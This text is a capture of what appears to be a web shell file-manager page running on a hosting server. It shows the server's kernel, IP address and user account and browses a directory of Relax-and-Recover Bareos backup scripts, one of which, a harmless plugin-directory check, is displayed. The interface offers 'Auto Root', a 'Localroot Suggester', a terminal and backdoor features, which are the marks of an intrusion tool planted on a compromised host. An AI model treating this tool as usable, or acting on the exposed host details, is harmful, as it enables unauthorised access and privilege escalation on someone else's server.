Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.62
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
prep /
BAREOS /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
400_prep_bareos.sh
273
B
-rw-r--r--
2026-04-01 09:39
450_check_bareos_config_files.sh
284
B
-rw-r--r--
2026-04-01 09:39
460_check_bareos_director.sh
562
B
-rw-r--r--
2026-04-01 09:39
500_check_bareos_client_configured.sh
1007
B
-rw-r--r--
2026-04-01 09:39
510_check_bareos_filesets.sh
2.81
KB
-rw-r--r--
2026-04-01 09:39
550_check_bareos_restore_jobs.sh
1.03
KB
-rw-r--r--
2026-04-01 09:39
570_check_bareos_plugin_dir.sh
338
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# prep/BAREOS/default/570_check_bareos_plugin_dir.sh # Purpose: check if the Bareos 'plugin' directory exists? If so, then add it to the COPY_AS_IS array if [[ -d /usr/lib/bareos/plugins ]] ; then COPY_AS_IS+=( /usr/lib/bareos/plugins ) elif [[ -d /usr/lib64/bareos/plugins ]] ; then COPY_AS_IS+=( /usr/lib64/bareos/plugins ) fi